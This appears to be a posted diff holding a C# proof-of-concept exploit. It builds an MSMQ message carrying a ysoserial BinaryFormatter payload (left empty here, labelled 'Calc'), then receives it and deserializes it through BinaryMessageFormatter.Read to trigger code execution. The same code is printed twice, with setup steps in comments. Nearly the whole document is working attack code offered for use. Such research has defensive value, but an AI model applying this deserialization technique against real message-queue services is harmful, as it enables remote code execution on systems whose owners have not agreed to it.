moohax · February 22, 2021 19:40
diff --git a/BinaryMessageFormatter.cs b/BinaryMessageFormatter.cs
 // 
 // Enable MSMQ in "Turn Windows Features on or off"
 // Open "Computer Management -> Services and Applications -> Message Queueing -> (Right click) Private Queue -> New"
 // There are differences between domain joined vs non queues
 // 
 // System.Messaging.BinaryMessageFormatter
 // public BinaryMessageFormatter()
 // {
 //    this.formatter = new BinaryFormatter();
 // }
 //
 // System.Messaging.BinaryMessageFormatter.Read(Message)
 // public object Read(Message message)
 // {
 //    if (message == null)
 //    {
 //        throw new ArgumentNullException("message");
 //    }
 //    int bodyType = message.BodyType;
 //    if (bodyType == 768)
 //    {
 //        Stream bodyStream = message.BodyStream;
 //        return this.formatter.Deserialize(bodyStream);
 //    }
 //    throw new InvalidOperationException(Res.GetString("InvalidTypeDeserialization"));
 // }

 using System;
 using System.Messaging;
 using System.IO;

 class Program
 {
    static void Main(string[] args)
    {
        // Binary formatter payload (I use ysoserial)
        string payload = "";
        
        // Create queue
        MessageQueue queue = new MessageQueue(".\\private$\\Queue");
        queue.Formatter = new BinaryMessageFormatter();
        byte[] fun = Convert.FromBase64String(payload);
        MemoryStream ms = new MemoryStream();
        ms.Write(fun, 0, fun.Length);
        
        // Create and send message the queue
        Message msg = new Message();
        msg.BodyStream = ms;
        msg.Label = "Calc";
        msg.BodyType = 768;
        queue.Send(msg);

        // Server
        MessageQueue outQueue = new MessageQueue(".\\private$\\orderqueue");
        outQueue.Formatter = new BinaryMessageFormatter();
        Message outMsg = outQueue.Receive();
        
        // Read malicious message
        outMsg.Formatter.Read(outMsg);
        Console.WriteLine("Press any key to stop...");
        Console.ReadKey();
    }
 }
	//
	// Enable MSMQ in "Turn Windows Features on or off"
	// Open "Computer Management -> Services and Applications -> Message Queueing -> (Right click) Private Queue -> New"
	// There are differences between domain joined vs non queues
	//
	// System.Messaging.BinaryMessageFormatter
	// public BinaryMessageFormatter()
	// {
	// this.formatter = new BinaryFormatter();
	// }
	//
	// System.Messaging.BinaryMessageFormatter.Read(Message)
	// public object Read(Message message)
	// {
	// if (message == null)
	// {
	// throw new ArgumentNullException("message");
	// }
	// int bodyType = message.BodyType;
	// if (bodyType == 768)
	// {
	// Stream bodyStream = message.BodyStream;
	// return this.formatter.Deserialize(bodyStream);
	// }
	// throw new InvalidOperationException(Res.GetString("InvalidTypeDeserialization"));
	// }

	using System;
	using System.Messaging;
	using System.IO;

	class Program
	{
	static void Main(string[] args)
	{
	// Binary formatter payload (I use ysoserial)
	string payload = "";

	// Create queue
	MessageQueue queue = new MessageQueue(".\\private$\\Queue");
	queue.Formatter = new BinaryMessageFormatter();
	byte[] fun = Convert.FromBase64String(payload);
	MemoryStream ms = new MemoryStream();
	ms.Write(fun, 0, fun.Length);

	// Create and send message the queue
	Message msg = new Message();
	msg.BodyStream = ms;
	msg.Label = "Calc";
	msg.BodyType = 768;
	queue.Send(msg);

	// Server
	MessageQueue outQueue = new MessageQueue(".\\private$\\orderqueue");
	outQueue.Formatter = new BinaryMessageFormatter();
	Message outMsg = outQueue.Receive();

	// Read malicious message
	outMsg.Formatter.Read(outMsg);
	Console.WriteLine("Press any key to stop...");
	Console.ReadKey();
	}
	}